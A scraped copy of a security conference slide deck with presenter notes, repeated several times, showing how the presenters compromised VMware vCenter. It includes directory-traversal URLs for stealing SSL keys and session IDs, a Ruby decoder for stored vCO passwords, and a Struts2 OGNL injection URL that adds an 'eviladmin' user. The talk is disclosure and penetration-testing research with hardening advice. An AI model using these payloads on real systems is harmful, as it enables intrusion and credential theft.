CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 5: Invest in security

Target

Presenter
Presentation Notes
We decided that much better approach would be attack VMware Infastructure management solution So out target vCenter version 41 update 113

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 6: Invest in security

VMware vCenter Server

bull VMware vCenter Server is solution to manage VMware vSphere

Presenter
Presentation Notes
Vmware vCenter is solution for management and configuration vShpere 13Containts a lot of services like VMware Update manager ndashsolution for path mangment vCenter Orchestrator ChargeBack Manager and others Each of services contains http and other ports 13

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-

usernamegt ltadministrator-

passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt

ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt

Presenter
Presentation Notes
It looks like hash it did not But they encoded using unknown algorithm

Password Encoding

006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079

vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random

Presenter
Presentation Notes
I encode few password and noticed that first 3 bytes is length then byte in ascii range and after some random bytes13

Algorithm password Encoding

for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +

position of symbol resultappend(toAdd)

Presenter
Presentation Notes
After searching in decompiled java code it was clear that encoding algorithm very simple It just generate 16 random bytes than take password and add to each byte its position in password

Password Decoder

len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end

Presenter
Presentation Notes
So I write simple decoder in one line ruby code13

VMSA-2011-0005

bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc

bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev

bull Fixed in 42

Presenter
Presentation Notes
One of interesting is bug at Apache Stust 2 discovered originally by Meder Kydariliev Guys from Digital defense found that VMware orchestrator use old struts2 library It library contains remote execution vulnerability discovered by Meder Kurdaliev13

CVE-2010-1870

bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as

OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)

Presenter
Presentation Notes
OGNL ndash is expression language for java It used for setting and getting properties of Java object It was possible because Stuts2 treat each HTTP parameter name as OGNL statement

CVE-2010-1870

bull OGNL support bull Method calling foo() bull Static method

calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session

context

Presenter
Presentation Notes
With OGNL statement you could call method creating new class call static method reference to variables with hash sign Meder found that Struts does not escape hash sign properly13

CVE-2010-1870

bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo

bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE

xecution]

Presenter
Presentation Notes
And there 2 values need to be set so we can execute java code With this exploit we could execute arbitrary code It was fixed at version 42

CVE-2010-1870

bull Example exploit bull _memberAccess[allowStaticMethodAccess] =

true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE

xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)

CVE-2010-1870

bull Example exploit bull httptarget8282loginaction

(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1

Hardering

bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide

Presenter
Presentation Notes
For hardering I recommend to update to latest version Config firewall so usual user could not have access to admins and management software Also there are Vmware vSphere Security Hardering Guide 13

Conclusions

bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all

infrastructure bull Password must be stored in hash with salt or

encrypted

Presenter
Presentation Notes
Conclusion of that story that some patches do not always fixed vulnerability and some research during penetration testing can produce interesting result 13

Thank you

aminozhenkodsecru al3xmin

  • How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
  • whoami
  • ERPScan
  • Target
  • Target
  • VMware vCenter Server
  • CVE-2009-1523
  • Directory traversalagain
  • Directory traversal
  • VASTO
  • Slide Number 11
  • Attack
  • Attack
  • Attack
  • Vmware vCenter Orchestrator
  • Slide Number 16
  • We get in
  • Plain text passwords
  • Vmware vCenter Orchestrator
  • VCxml
  • Password Encoding
  • Algorithm password Encoding
  • Password Decoder
  • VMSA-2011-0005
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • CVE-2010-1870
  • Hardering
  • Conclusions
  • Thank you
Page 7: Invest in security

CVE-2009-1523

bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (

Presenter
Presentation Notes
First thing we do is check exploit-db security mail list to find some vulns13There are not a lot of bugs at vCenter 13First we saw classical directory traversal discovered by Claudio Criscione in VMware Update Manager The vulnerability was caused by Jetty web server which is bind on port 9084 The cause of bug was in alias handling on windows We can read any file by exploiting this bug 13But unfortunaly this bug was fixed in our version So we could not use it

Directory traversalagain

bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C

5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by

sinn3r

Presenter
Presentation Notes
But Alexey Sintsov do not trust patches and after 15 minutes he find the same bug at the same place Threre are metasploit module written by s3nner which exploit this bug13

Directory traversal

bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -

SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1

bull Contains logs of SOAP requests with session ID

Presenter
Presentation Notes
But what file to read Claudio proposed to read vpxd-profiler log files This files contains SOAP requests with session id And we replace our session id with session id of admins13

VASTO

bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg

bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb

Local proxy to ride stolen SOAPID sessions

Presenter
Presentation Notes
He also developed tool VASTO which is collection of metasploit module for exploiting virtualization infrastructure It has module for exploiting traversal directory and is has proxy which replace session id with stolen session id 13

bull Fixed in version 41 update 1 bull contain ip - addresses

Presenter
Presentation Notes
But VMware developers have worked well and cleaned the log file from session ids but it contains ip address which can be useful So we need to find another file to read 13

Attack

bull Make arp spoofing bull Spoof ssl certificate

Presenter
Presentation Notes
So we decided to try classic arp spoofing but vSphere client use ssl and we need to spoof ssl cert13

Attack

bull Administrators check SSL cert

Presenter
Presentation Notes
But it did not work because admins was clever they add cert to trusted zone and does not push ldquoIgnore buttonrdquo13

Attack

bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll

UsersApplication DataVMwareVMware VirtualCenterSSLruikey

bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work

Presenter
Presentation Notes
So we try use directory traversal which we found to steal ssl private keysThen make arp-spoofing decrypt ssl traffic using this key and stole admin session id13

Vmware vCenter Orchestrator

bull Vmware vCO ndash software for automate configuration and management

bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties

Presenter
Presentation Notes
And that worked pretty well But we wanted more What if arp spoofing does not work So we decided to look for something else 13We noticed VMware vCenter Orchestrator ndash interface for managing vCenter So we thought that it must store password from vCenter somewhere 13

bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables

GPU

Presenter
Presentation Notes
We found them in jettyetcpasswdproperties in form of md5 hash without a salt So it was not hard to bruteforce them13

We get in

Presenter
Presentation Notes
After login to vCO we noticed that it used for management of vCenter You can on slide there are some plugins on left domain controllers mail ssh and almost each plugin have password So it must stored somewhere password for vCenter Would it be cool if we can read them13

Plain text passwords

Presenter
Presentation Notes
Actuale the was in plaintext13We found out that it store password from mail account domen controllers and others in plain text 13

Vmware vCenter Orchestrator

bull vCO stored password at files bull CProgram

FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml

bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties

Presenter
Presentation Notes
We go further and find some passwords in file VCxml vmopropeties

VCxml

